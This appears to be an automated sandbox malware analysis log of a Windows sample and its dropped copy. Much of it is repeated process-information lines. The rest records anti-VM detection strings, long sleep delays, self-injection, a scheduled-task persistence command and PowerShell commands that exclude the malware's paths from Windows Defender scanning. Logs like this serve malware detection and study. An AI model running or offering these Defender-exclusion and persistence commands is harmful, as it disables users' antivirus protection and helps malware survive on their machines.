Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory allocated: 13C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory allocated: 2F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory allocated: 4F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory allocated: 7FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory allocated: 8FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory allocated: 9190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory allocated: A190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory allocated: AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory allocated: 72B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory allocated: 82B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory allocated: 8450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory allocated: 9450000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7560	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 545	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8097	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 403	Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe TID: 3936	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4288	Thread sleep count: 8097 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948	Thread sleep count: 403 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe TID: 1076	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe TID: 1076	Thread sleep time: -4860000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe TID: 3032	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: HxQXdrrQ.exe, 0000000A.00000002.2115861588.000000000597F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: HxQXdrrQ.exe, 0000000F.00000002.2088749418.0000000000D38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
Source: YvVDV4cbjy.exe, 00000000.00000002.2063301617.0000000001440000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\X F
Source: YvVDV4cbjy.exe, 00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Code function: 15_2_0040317B mov eax, dword ptr fs:[00000030h]

15_2_0040317B

Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Code function: 15_2_00402B7C GetProcessHeap,HeapAlloc,

15_2_00402B7C

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Memory written: C:\Users\user\Desktop\YvVDV4cbjy.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Memory written: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Queries volume information: C:\Users\user\Desktop\YvVDV4cbjy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
